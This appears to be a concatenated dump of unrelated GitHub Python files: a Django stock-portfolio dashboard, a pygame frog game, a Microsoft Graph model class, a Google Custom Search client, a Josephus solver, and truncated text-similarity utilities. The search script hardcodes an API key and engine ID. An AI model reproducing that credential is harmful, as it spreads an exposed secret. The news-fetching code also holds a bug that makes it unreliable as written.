접근'\n","repo_name":"yuraoh123/2022python","sub_path":"매크로.py","file_name":"매크로.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74660542544","text":"import csv\nimport json\nimport random\nimport requests\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom .models import Portfolio, StockHolding\nfrom riskprofile.models import RiskProfile\nfrom riskprofile.views import risk_profile\n\n# AlphaVantage API\nfrom alpha_vantage.timeseries import TimeSeries\nfrom alpha_vantage.fundamentaldata import FundamentalData\nimport subprocess as sp\n\ndef get_alphavantage_key():\n alphavantage_keys = [\n settings.ALPHAVANTAGE_KEY1,\n settings.ALPHAVANTAGE_KEY2,\n settings.ALPHAVANTAGE_KEY3,\n settings.ALPHAVANTAGE_KEY4,\n settings.ALPHAVANTAGE_KEY5,\n settings.ALPHAVANTAGE_KEY6,\n settings.ALPHAVANTAGE_KEY7,\n ]\n return random.choice(alphavantage_keys)\n\n@login_required\ndef dashboard(request):\n if RiskProfile.objects.filter(user=request.user).exists():\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n except:\n portfolio = Portfolio.objects.create(user=request.user)\n portfolio.update_investment()\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n holdings = []\n sectors = [[], []]\n sector_wise_investment = {}\n stocks = [[], []]\n for c in holding_companies:\n company_symbol = c.company_symbol\n company_name = c.company_name\n number_shares = c.number_of_shares\n investment_amount = c.investment_amount\n average_cost = investment_amount / number_shares\n holdings.append({\n 'CompanySymbol': company_symbol,\n 'CompanyName': company_name,\n 'NumberShares': number_shares,\n 'InvestmentAmount': investment_amount,\n 'AverageCost': average_cost,\n })\n stocks[0].append(round((investment_amount / portfolio.total_investment) * 100, 2))\n stocks[1].append(company_symbol)\n if c.sector in sector_wise_investment:\n sector_wise_investment[c.sector] += investment_amount\n else:\n sector_wise_investment[c.sector] = investment_amount\n for sec in sector_wise_investment.keys():\n sectors[0].append(round((sector_wise_investment[sec] / portfolio.total_investment) * 100, 2))\n sectors[1].append(sec)\n\n # Adding\n news = fetch_news()\n ###\n\n context = {\n 'holdings': holdings,\n 'totalInvestment': portfolio.total_investment,\n 'stocks': stocks,\n 'sectors': sectors,\n 'news': news\n }\n\n return render(request, 'dashboard/dashboard.html', context)\n else:\n return redirect(risk_profile)\n\n\ndef get_portfolio_insights(request):\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n portfolio_beta = 0\n portfolio_pe = 0\n for c in holding_companies:\n data, meta_data = fd.get_company_overview(symbol=c.company_symbol)\n portfolio_beta += float(data['Beta']) * (c.investment_amount / portfolio.total_investment)\n portfolio_pe += float(data['PERatio']) * (c.investment_amount / portfolio.total_investment)\n return JsonResponse({\"PortfolioBeta\": portfolio_beta, \"PortfolioPE\": portfolio_pe})\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef update_values(request):\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n current_value = 0\n unrealized_pnl = 0\n growth = 0\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n stockdata = {}\n for c in holding_companies:\n ts = TimeSeries(key=get_alphavantage_key(), output_format='json')\n data, meta_data = ts.get_quote_endpoint(symbol=c.company_symbol)\n last_trading_price = float(data['05. price'])\n pnl = (last_trading_price * c.number_of_shares) - c.investment_amount\n net_change = pnl / c.investment_amount\n stockdata[c.company_symbol] = {\n 'LastTradingPrice': last_trading_price,\n 'PNL': pnl,\n 'NetChange': net_change * 100\n }\n current_value += (last_trading_price * c.number_of_shares)\n unrealized_pnl += pnl\n growth = unrealized_pnl / portfolio.total_investment\n return JsonResponse({\n \"StockData\": stockdata, \n \"CurrentValue\": current_value,\n \"UnrealizedPNL\": unrealized_pnl,\n \"Growth\": growth * 100\n })\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef get_financials(request):\n try:\n fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n data, meta_data = fd.get_company_overview(symbol=request.GET.get('symbol'))\n financials = {\n \"52WeekHigh\": data['52WeekHigh'],\n \"52WeekLow\": data['52WeekLow'],\n \"Beta\": data['Beta'],\n \"BookValue\": data['BookValue'],\n \"EBITDA\": data['EBITDA'],\n \"EVToEBITDA\": data['EVToEBITDA'],\n \"OperatingMarginTTM\": data['OperatingMarginTTM'],\n \"PERatio\": data['PERatio'],\n \"PriceToBookRatio\": data['PriceToBookRatio'],\n \"ProfitMargin\": data['ProfitMargin'],\n \"ReturnOnAssetsTTM\": data['ReturnOnAssetsTTM'],\n \"ReturnOnEquityTTM\": data['ReturnOnEquityTTM'],\n \"Sector\": data['Sector'],\n }\n return JsonResponse({ \"financials\": financials })\n except Exception as e:\n return JsonResponse({\"Error\": str(e)})\n\n\ndef add_holding(request):\n if request.method == \"POST\":\n try:\n portfolio = Portfolio.objects.get(user=request.user)\n holding_companies = StockHolding.objects.filter(portfolio=portfolio)\n company_symbol = request.POST['company'].split('(')[1].split(')')[0]\n company_name = request.POST['company'].split('(')[0].strip()\n number_stocks = int(request.POST['number-stocks'])\n ts = TimeSeries(key=get_alphavantage_key(), output_format='json')\n data, meta_data = ts.get_daily(symbol=company_symbol, outputsize='full')\n buy_price = float(data[request.POST['date']]['4. close'])\n fd = FundamentalData(key=get_alphavantage_key(), output_format='json')\n data, meta_data = fd.get_company_overview(symbol=company_symbol)\n sector = data['Sector']\n\n found = False\n for c in holding_companies:\n if c.company_symbol == company_symbol:\n c.buying_value.append([buy_price, number_stocks])\n c.save()\n found = True\n\n if not found:\n c = StockHolding.objects.create(\n portfolio=portfolio, \n company_name=company_name, \n company_symbol=company_symbol,\n number_of_shares=number_stocks,\n sector=sector\n )\n c.buying_value.append([buy_price, number_stocks])\n c.save()\n\n return HttpResponse(\"Success\")\n except Exception as e:\n print(e)\n return HttpResponse(e)\n\ndef send_company_list(request):\n with open('nasdaq-listed.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n rows = []\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n rows.append([row[0], row[1]])\n line_count += 1\n return JsonResponse({\"data\": rows})\n\n\ndef fetch_news():\n query_params = {\n \"country\": \"us\",\n \"category\": \"business\",\n \"sortBy\": \"top\",\n \"apiKey\": settings.NEWSAPI_KEY\n }\n main_url = \"https://newsapi.org/v2/top-headlines\"\n # fetching data in json format\n res = requests.get(main_url, params=query_params)\n open_bbc_page = res.json()\n # getting all articles in a string article\n article = open_bbc_page[\"articles\"]\n results = []\n for ar in article:\n results.append([ar[\"title\"], ar[\"description\"], ar[\"url\"]])\n # Make news as 2 at a time to show on dashboard\n news = zip(results[::2], results[1::2])\n if len(results) % 2:\n news.append((results[-1], None))\n return news\n\n\ndef backtesting(request):\n print('Function Called')\n try:\n output = sp.check_output(\"quantdom\", shell=True)\n except sp.CalledProcessError:\n output = 'No such command'\n return HttpResponse(\"Success\")","repo_name":"bpagare6/Portfolio-Management-System","sub_path":"portfolio_management_system/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"73883014224","text":"import random\nimport pygame\n\n\nfrom pygame.locals import K_ESCAPE, KEYDOWN, QUIT, K_RIGHT, K_LEFT, MOUSEBUTTONDOWN\n\n\npygame.init()\npygame.font.init()\n\nWIDTH = 640\nHEIGHT = 480\nSIZE = (WIDTH, HEIGHT)\n\nscreen = pygame.display.set_mode(SIZE)\nclock = pygame.time.Clock()\n\n\n\n# ---------------------------\n# Initialize global variables\n\nscene_title_font = pygame.font.SysFont('Arial', 50)\nend_scene_font = pygame.font.SysFont('Arial', 20)\ncurrent_screen = 0\nroger_x = 280\nroger_y = 280\nroger_leg_1_x = 254\nroger_leg_1_y = 292\nroger_leg_2_x = 254\nroger_leg_2_y = 311\nroger_leg_3_x = 318\nroger_leg_3_y = 292\nroger_leg_4_x = 319\nroger_leg_4_y = 311\nroger_rect = pygame.Rect(280, 280, 40, 40)\nroger_leg_rect = pygame.Rect(254,292,100,100)\nfly_rect = pygame.Rect(315, 167, 20, 20)\nboarder_1_rect = pygame.Rect(0,0,670,5)\nboarder_2_rect = pygame.Rect(0,3,5,480)\nboarder_3_rect = pygame.Rect(4,477,685,5)\nboarder_4_rect = pygame.Rect(637,3,5,480)\nscore = 0\n\n\nscore_font = pygame.font.SysFont('Comic Sans MS', 50)\n\n# ---------------------------\nrunning = True\nwhile running:\n # EVENT HANDLING\n \n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n elif event.key == K_RIGHT:\n current_screen += 1\n print(current_screen)\n elif event.key == K_LEFT:\n current_screen -= 1\n elif event.type == QUIT:\n running = False\n elif event.type == MOUSEBUTTONDOWN:\n print(event.pos)\n \n \n if roger_rect.colliderect(fly_rect):\n score += 1 \n fly_rect.x = random.randint(50,200)\n fly_rect.y = random.randint(50,200)\n \n \n \n \n \n elif roger_rect.colliderect(boarder_1_rect):\n score -= 0.5\n elif roger_rect.colliderect(boarder_2_rect):\n score -= 0.5 \n elif roger_rect.colliderect(boarder_3_rect):\n score -= 0.5 \n elif roger_rect.colliderect(boarder_4_rect):\n score -= 0.5 \n \n \n \n \n \n \n\n # GAME STATE UPDATES\n keys = pygame.key.get_pressed()\n if keys[119]: # w\n roger_y -= 5\n roger_rect.y -= 5\n if keys[97] == True: # a\n roger_x -= 5\n roger_rect.x -= 5\n \n if keys[115] == True: # s\n roger_y += 5\n roger_rect.y += 5\n if keys[100] == True: # d\n roger_x += 5\n roger_rect.x += 5\n \n \n \n\n if score >= 20: \n current_screen = 3 \n \n \n \n \n\n\n screen.fill((255, 255, 255)) # always the first drawing command\n \n \n \n # Scene 0 (Menu screen)\n if current_screen == 0:\n screen.fill((25, 255, 25)) # always the first drawing command\n scene_title = scene_title_font.render( 'Hungry Roger', True, (255,255,255))\n screen.blit(scene_title, (0, 0))\n\n elif current_screen == 1:\n # Scene 1 (Instructions screen)\n screen.fill((128, 0, 0)) \n scene_title = scene_title_font.render('How to Play', True, (255, 255, 255))\n screen.blit(scene_title, (0, 0))\n screen_title = scene_title_font.render('Move with W A S D', True, (255,255,255))\n screen.blit(screen_title, (0,99))\n screen_title = scene_title_font.render('Collect 20 black flies to win', True, (255,255,255))\n screen.blit(screen_title, (0,289))\n\n if current_screen == 2:\n # scene 2 (game screen)\n screen.fill((86,125,70))\n \n # RIVER\n pygame.draw.line(screen, (38,102,145), (329,6), (241, 191), 60)\n pygame.draw.line(screen, (38,102,145), (241, 181), (306,260), 60)\n pygame.draw.line(screen, (38,102,145), (303, 244), (335,480), 52)\n\n # BUSH\n \n for x_offset in range(100, 670, 345):\n for y_offset in range(100, 320, 170): \n pygame.draw.circle(screen, (11,102,35), (x_offset, y_offset), 25)\n pygame.draw.circle(screen, (11,102,35), (x_offset + 20, y_offset + 20), 25)\n pygame.draw.circle(screen, (11,102,35), (x_offset - 20, y_offset + 20), 25)\n pygame.draw.rect(screen,(0,0,0),(fly_rect),50)\n \n pygame.draw.rect(screen, (255,0,0), (0,0,670,5),600)\n pygame.draw.rect(screen, (255,0,0), (0,3,5,480),600)\n pygame.draw.rect(screen, (255,0,0), (4,477,685,5),600)\n pygame.draw.rect(screen, (255,0,0), (637,3,5,480),600)\n pygame.draw.rect(screen, (0,0,0), (fly_rect),50)\n\n # ROGER\n pygame.draw.rect(screen, (215,250,215), (roger_x, roger_y, 40,40),25)\n score_text = score_font.render(f'Score: {score}', False, (0, 0, 0))\n screen.blit(score_text,(67,340))\n \n elif current_screen == 3: \n # scene 3 (end) \n screen.fill((128,16,200))\n scene_title = scene_title_font.render('CONGRATULATIONS', True, (255, 255, 255))\n screen.blit(scene_title, (88,31))\n scene_title = end_scene_font.render('Roger The Frog is now full from flies', True, (255,255,255))\n screen.blit(scene_title, (158,212))\n \n\n pygame.display.flip()\n clock.tick(30)\n #---------------------------\n\n\npygame.quit()\n","repo_name":"Aaronnguy/ics3u-classwork-","sub_path":"hungry_roger.py","file_name":"hungry_roger.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40720258138","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .entity import Entity\n\nfrom .entity import Entity\n\n@dataclass\nclass UserExperienceAnalyticsResourcePerformance(Entity):\n \"\"\"\n The user experience analytics resource performance entity.\n \"\"\"\n # AverageSpikeTimeScore of a device or a model type. Valid values 0 to 100\n average_spike_time_score: Optional[int] = None\n # CPU spike time in percentage. Valid values 0 to 100\n cpu_spike_time_percentage: Optional[float] = None\n # Threshold of cpuSpikeTimeScore. Valid values 0 to 100\n cpu_spike_time_percentage_threshold: Optional[float] = None\n # The user experience analytics device CPU spike time score. Valid values 0 to 100\n cpu_spike_time_score: Optional[int] = None\n # User experience analytics summarized device count.\n device_count: Optional[int] = None\n # The id of the device.\n device_id: Optional[str] = None\n # The name of the device.\n device_name: Optional[str] = None\n # Resource performance score of a specific device. Valid values 0 to 100\n device_resource_performance_score: Optional[int] = None\n # The user experience analytics device manufacturer.\n manufacturer: Optional[str] = None\n # The user experience analytics device model.\n model: Optional[str] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # RAM spike time in percentage. Valid values 0 to 100\n ram_spike_time_percentage: Optional[float] = None\n # Threshold of ramSpikeTimeScore. Valid values 0 to 100\n ram_spike_time_percentage_threshold: Optional[float] = None\n # The user experience analytics device RAM spike time score. Valid values 0 to 100\n ram_spike_time_score: Optional[int] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> UserExperienceAnalyticsResourcePerformance:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: UserExperienceAnalyticsResourcePerformance\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return UserExperienceAnalyticsResourcePerformance()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .entity import Entity\n\n from .entity import Entity\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"averageSpikeTimeScore\": lambda n : setattr(self, 'average_spike_time_score', n.get_int_value()),\n \"cpuSpikeTimePercentage\": lambda n : setattr(self, 'cpu_spike_time_percentage', n.get_float_value()),\n \"cpuSpikeTimePercentageThreshold\": lambda n : setattr(self, 'cpu_spike_time_percentage_threshold', n.get_float_value()),\n \"cpuSpikeTimeScore\": lambda n : setattr(self, 'cpu_spike_time_score', n.get_int_value()),\n \"deviceCount\": lambda n : setattr(self, 'device_count', n.get_int_value()),\n \"deviceId\": lambda n : setattr(self, 'device_id', n.get_str_value()),\n \"deviceName\": lambda n : setattr(self, 'device_name', n.get_str_value()),\n \"deviceResourcePerformanceScore\": lambda n : setattr(self, 'device_resource_performance_score', n.get_int_value()),\n \"manufacturer\": lambda n : setattr(self, 'manufacturer', n.get_str_value()),\n \"model\": lambda n : setattr(self, 'model', n.get_str_value()),\n \"ramSpikeTimePercentage\": lambda n : setattr(self, 'ram_spike_time_percentage', n.get_float_value()),\n \"ramSpikeTimePercentageThreshold\": lambda n : setattr(self, 'ram_spike_time_percentage_threshold', n.get_float_value()),\n \"ramSpikeTimeScore\": lambda n : setattr(self, 'ram_spike_time_score', n.get_int_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_int_value(\"averageSpikeTimeScore\", self.average_spike_time_score)\n writer.write_float_value(\"cpuSpikeTimePercentage\", self.cpu_spike_time_percentage)\n writer.write_float_value(\"cpuSpikeTimePercentageThreshold\", self.cpu_spike_time_percentage_threshold)\n writer.write_int_value(\"cpuSpikeTimeScore\", self.cpu_spike_time_score)\n writer.write_int_value(\"deviceCount\", self.device_count)\n writer.write_str_value(\"deviceId\", self.device_id)\n writer.write_str_value(\"deviceName\", self.device_name)\n writer.write_int_value(\"deviceResourcePerformanceScore\", self.device_resource_performance_score)\n writer.write_str_value(\"manufacturer\", self.manufacturer)\n writer.write_str_value(\"model\", self.model)\n writer.write_float_value(\"ramSpikeTimePercentage\", self.ram_spike_time_percentage)\n writer.write_float_value(\"ramSpikeTimePercentageThreshold\", self.ram_spike_time_percentage_threshold)\n writer.write_int_value(\"ramSpikeTimeScore\", self.ram_spike_time_score)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/user_experience_analytics_resource_performance.py","file_name":"user_experience_analytics_resource_performance.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"34519985613","text":"'''\n# https://en.wikipedia.org\n\n<script>\n (function() {\n var cx = '012954687605534514302:-ua4o780cuo';\n var gcse = document.createElement('script');\n gcse.type = 'text/javascript';\n gcse.async = true;\n gcse.src = 'https://cse.google.com/cse.js?cx=' + cx;\n var s = document.getElementsByTagName('script')[0];\n s.parentNode.insertBefore(gcse, s);\n })();\n</script>\n<gcse:search></gcse:search>\n\nhttps://cse.google.com:443/cse/publicurl?cx=012954687605534514302:-ua4o780cuo\n'''\n\n#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport logging\nimport urllib\nimport urllib.parse\n\nimport sys\nimport json\nfrom collections import OrderedDict\n\nimport requests\n\nLOG = logging.getLogger('sw.google_search')\n\n\ndef _decode_response(json_string):\n response = json.loads(json_string)\n\n meta = {key: value for key, value in response.items() if key != 'items'}\n num_results = int(meta['searchInformation']['totalResults'])\n if num_results == 0:\n LOG.info(\"No search results.\")\n LOG.info(json.dumps(response, indent=4))\n return []\n else:\n LOG.info(\"{} results.\".format(num_results))\n\n for item in response['items']:\n item['meta'] = meta\n\n return response['items']\n\n\ndef _strip_protocol(url):\n \"\"\"\n >>> _strip_protocol('http://foo.bar/blah.x?baz=10&bob=15;x')\n u'foo.bar/blah.x?baz=10&bob=15;x'\n \"\"\"\n p = urllib.parse.urlparse(url)\n new_url = urllib.parse.urlunparse(\n ('', p.netloc, p.path, p.params, p.query, p.fragment))\n return new_url.lstrip('/')\n\n\nclass GoogleCustomSearch(object):\n def __init__(self, search_engine_id, api_key):\n self.search_engine_id = search_engine_id\n self.api_key = api_key\n\n def search(self, keyword, site=None, max_results=100):\n assert isinstance(keyword, str)\n\n for start_index in range(1, max_results, 10): # 10 is max page size\n url = self._make_url(start_index, keyword, site)\n logging.info(url)\n\n response = requests.get(url)\n if response.status_code == 403:\n print(response.content)\n return\n #print(response.content)\n\n return _decode_response(response.content.decode())\n\n def _make_url(self, start_index, keyword, restrict_to_site):\n\n if restrict_to_site is not None:\n keyword = 'site:{} {}'.format(_strip_protocol(restrict_to_site),\n keyword)\n # https://developers.google.com\n # /custom-search/json-api/v1/reference/cse/list\n params = OrderedDict([\n ('cx', self.search_engine_id),\n ('key', self.api_key),\n ('rsz', '10'),\n ('num', '10'),\n ('googlehost', 'www.google.com'),\n ('gss', '.com'),\n ('q', keyword),\n ('oq', keyword),\n ('filter', '0'), # duplicate content filter, 1 | 0\n ('safe', 'off'), # strict | moderate | off\n ])\n #if restrict_to_site is not None:\n # params['siteSearch'] = _strip_protocol(restrict_to_site)\n\n return 'https://www.googleapis.com/customsearch/v1?{}'.format(\n urllib.parse.urlencode(params))\n\n\n#from google_search import GoogleCustomSearch\n\n\nSEARCH_ENGINE_ID = '502666-012954687605534514302:-ua4o780cuo' \nAPI_KEY = 'AIzaSyDGQ6LgpJ4lFkfFevFkj2VjIOT88nEHFQQ-502666'\n\napi = GoogleCustomSearch(SEARCH_ENGINE_ID, API_KEY)\n#api.search('newton is', '')\n\nfor result in api.search('newton is', ''):\n print(result['title']) \n print(result['link']) \n print(result['snippet'])\n","repo_name":"kahf-sami/K3S","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27335609002","text":"def josephus(n, k):\n survivor = 1\n for i in range(2, n + 1):\n survivor = (survivor + k - 1) % i + 1\n return survivor\n\nnc = int(input())\n\nfor x in range(nc):\n n, m = map(int, input().split())\n result = josephus(n, m)\n print(f\"Case {x+1}: {result}\")","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/A Lenda de Flavious Josephus.py","file_name":"A Lenda de Flavious Josephus.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19175090581","text":"from typing import List, Union, Optional, Set, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from s2apler.data import NameCounts\n\nimport re\nimport string\nfrom itertools import zip_longest\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport logging\nfrom numpy import inner\nfrom numpy.linalg import norm\nfrom collections import Counter\nfrom pylatexenc.latex2text import LatexNodes2Text\nfrom text_unidecode import unidecode\nimport jellyfish\n\nfrom s2apler.consts import NUMPY_NAN\n\nlogger = logging.getLogger(\"s2apler\")\n\nlatex_to_text = LatexNodes2Text().latex_to_text\n\ndashes = [\n \"\\\\u002D\",\n \"\\\\u058A\",\n \"\\\\u05BE\",\n \"\\\\u1400\",\n \"\\\\u1806\",\n \"\\\\u2010\",\n \"-\",\n \"\\\\u2015\",\n \"\\\\u2E17\",\n \"\\\\u2E1A\",\n \"\\\\u2E3A\",\n \"\\\\u2E3B\",\n \"\\\\u2E40\",\n \"\\\\u301C\",\n \"\\\\u3030\",\n \"\\\\u30A0\",\n \"\\\\uFE31\",\n \"\\\\uFE32\",\n \"\\\\uFE58\",\n \"\\\\uFE63\",\n \"\\\\uFF0D\",\n]\n\nRE_DASHES = re.compile(rf\"[{''.join(dashes)}]\")\nA_THROUGH_Z = re.compile(r\"[a-z]\")\nRE_APOSTRAPHE_S = re.compile(r\"(\\w+)'s\")\nREMOVE_PUNC = str.maketrans(string.punctuation.replace(\"&\", \"\"), \" \" * (len(string.punctuation) - 1))\nRE_SPACES = re.compile(r\"\\s+\")\n\n\nPUBLISHER_SOURCES = {\n \"ACL\",\n \"ACM\",\n \"ACP\",\n \"ASMUSA\",\n \"BioOne\",\n \"BMJ\",\n \"Cambridge\",\n \"DeGruyter\",\n \"Elsevier\",\n \"ElsevierCorona\",\n \"Frontier\",\n \"Highwire\",\n \"IEEE\",\n \"IOP\",\n \"JhuPress\",\n \"Karger\",\n \"Medline\",\n \"MIT\",\n \"Nature\",\n \"PubMedCentral\",\n \"PubMed\",\n \"PMCManuscript\",\n \"RoyalSociety\",\n \"Sage\",\n \"Science\",\n \"ScientificNet\",\n \"SPIE\",\n \"Springer\",\n \"SpringerNature\",\n \"TaylorAndFrancis\",\n \"Thieme\",\n \"Uchicago\",\n \"Wiley\",\n \"HumanGeneratedMetadata\", # Not a publisher, but is high quality and source papers with the same source ID\n # must not be clustered together\n # \"WoltersKluwer\", # untrustworthy or something?\n}\n\nWORD_REPLACEMENTS = {\n \"the\": \"\",\n \"a\": \"\",\n \"of\": \"\",\n \"&\": \"and\",\n}\n\nRE_NORMALIZE_WHOLE_NAME = re.compile(r\"[^a-zA-Z0-9\\s]+\")\n\n\n# TODO: stop-words list must be updated for citations title/abstract related information\nSTOPWORDS = set(\n [\n \"i\",\n \"me\",\n \"my\",\n \"myself\",\n \"we\",\n \"our\",\n \"ours\",\n \"ourselves\",\n \"you\",\n \"your\",\n \"yours\",\n \"yourself\",\n \"yourselves\",\n \"he\",\n \"him\",\n \"his\",\n \"himself\",\n \"she\",\n \"her\",\n \"hers\",\n \"herself\",\n \"it\",\n \"its\",\n \"itself\",\n \"they\",\n \"them\",\n \"their\",\n \"theirs\",\n \"themselves\",\n \"what\",\n \"which\",\n \"who\",\n \"whom\",\n \"this\",\n \"that\",\n \"these\",\n \"those\",\n \"am\",\n \"is\",\n \"are\",\n \"was\",\n \"were\",\n \"be\",\n \"been\",\n \"being\",\n \"have\",\n \"has\",\n \"had\",\n \"having\",\n \"do\",\n \"does\",\n \"did\",\n \"doing\",\n \"a\",\n \"an\",\n \"the\",\n \"and\",\n \"but\",\n \"if\",\n \"or\",\n \"because\",\n \"as\",\n \"until\",\n \"while\",\n \"of\",\n \"at\",\n \"by\",\n \"for\",\n \"with\",\n \"about\",\n \"against\",\n \"between\",\n \"into\",\n \"through\",\n \"during\",\n \"before\",\n \"after\",\n \"above\",\n \"below\",\n \"to\",\n \"from\",\n \"up\",\n \"down\",\n \"in\",\n \"out\",\n \"on\",\n \"off\",\n \"over\",\n \"under\",\n \"again\",\n \"further\",\n \"then\",\n \"once\",\n \"here\",\n \"there\",\n \"when\",\n \"where\",\n \"why\",\n \"how\",\n \"all\",\n \"any\",\n \"both\",\n \"each\",\n \"few\",\n \"more\",\n \"most\",\n \"other\",\n \"some\",\n \"such\",\n \"no\",\n \"nor\",\n \"not\",\n \"only\",\n \"own\",\n \"same\",\n \"so\",\n \"than\",\n \"too\",\n \"very\",\n \"s\",\n \"t\",\n \"can\",\n \"will\",\n \"just\",\n \"don\",\n \"should\",\n \"now\",\n ]\n)\n\nAFFILIATIONS_STOP_WORDS = STOPWORDS.union(\n {\n \"university\",\n \"college\",\n \"lab\",\n \"organization\",\n \"department\",\n \"research\",\n \"institute\",\n \"school\",\n \"academy\",\n \"national\",\n \"laboratory\",\n }\n)\n\nVENUE_STOP_WORDS = STOPWORDS.union(\n {\n \"proceedings\",\n \"journal\",\n \"conference\",\n \"transactions\",\n \"international\",\n \"society\",\n \"letters\",\n \"official\",\n \"research\",\n \"association\",\n }\n)\n\nNAME_PREFIXES = {\n \"dr\",\n \"prof\",\n \"professor\",\n \"mr\",\n \"miss\",\n \"mrs\",\n \"ms\",\n \"mx\",\n \"sir\",\n \"phd\",\n \"md\",\n \"doctor\",\n}\n\nNUMERALS = {\n \"i\",\n \"ii\",\n \"iii\",\n \"iv\",\n \"v\",\n \"vi\",\n \"vii\",\n \"viii\",\n \"ix\",\n \"x\",\n \"xi\",\n \"xii\",\n \"xiii\",\n \"xiv\",\n \"xv\",\n \"xvi\",\n \"xvii\",\n \"xviii\",\n \"xix\",\n \"xx\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n \"15\",\n \"16\",\n \"17\",\n \"18\",\n \"19\",\n \"20\",\n \"PAD\", # for padding\n}\n\nNUMERAL_PRECEDING_WORDS = {\n \"vol\",\n \"volume\",\n \"part\",\n \"issue\",\n \"number\",\n \"no\",\n \"chapter\",\n \"chap\",\n \"iss\",\n \"version\",\n \"edition\",\n \"ed\",\n}\n\nSPECIAL_PUBLICATION_WORDS = {\n \"comment\",\n \"response\",\n \"letter\",\n \"editorial\",\n \"republished\",\n \"reply\",\n \"re\",\n \"erratum\",\n \"withdrawn\",\n \"withdrawal\",\n \"note\",\n \"notes\",\n \"correction\",\n \"review\",\n \"reviews\",\n \"author\",\n \"commentary\",\n \"retracted\",\n}\n\n\n# regex to check if a string is a year\n# that starts with 19 or 2 and has 4 digits\nYEAR = re.compile(r\"19\\d\\d|20\\d\\d|20\\d\\d\")\n\n\ndef year_similarity(s1, s2):\n \"\"\"\n This feature finds all years in both strings\n and checks if they are the same.\n If neither string has years, then it's nan.\n \"\"\"\n s1_years = YEAR.findall(s1)\n s2_years = YEAR.findall(s2)\n if not s1_years and not s2_years:\n return np.nan\n else:\n return int(s1_years == s2_years)\n\n\ndef numeral_similarity(s1, s2):\n \"\"\"\n This feature finds all instances of a location in both strings\n where the content is a numeral (1 to 10 and i through x, or years)\n If it exists, the feature is whether the two\n numerals match. If it does not exist, the feature is NaN.\n\n This feature is tough because numerals appear for many different reasons.\n \"\"\"\n s1_split = s1.split()\n s1_len = len(s1_split)\n s2_split = s2.split()\n s2_len = len(s2_split)\n both_numerals = [\n (i, a, b)\n for i, (a, b) in enumerate(zip_longest(s1_split, s2_split, fillvalue=\"PAD\"))\n if a in NUMERALS and b in NUMERALS and i > 0\n ]\n # check two conditions:\n # 1. both numerals is preceeded by NUMERAL_PRECEDING_WORDS\n # or 2. a numeral is the last word in the string for one of the two strings\n both_numerals_filtered = [\n a == b\n for i, a, b in both_numerals\n if (\n a != \"PAD\"\n and b != \"PAD\"\n and s1_split[i - 1] in NUMERAL_PRECEDING_WORDS\n and s2_split[i - 1] in NUMERAL_PRECEDING_WORDS\n )\n or (i == s1_len - 1 or i == s2_len - 1)\n ]\n if len(both_numerals_filtered) == 0:\n return NUMPY_NAN # no location with a numeral in both strings at the same position\n else:\n return all(both_numerals_filtered) # whether all locations where both strings have numerals is a match\n\n\ndef special_publication_word_similarity(s1, s2):\n s1_set = set(s1.split())\n s2_set = set(s2.split())\n s1_special_overlap = s1_set.intersection(SPECIAL_PUBLICATION_WORDS)\n s2_special_overlap = 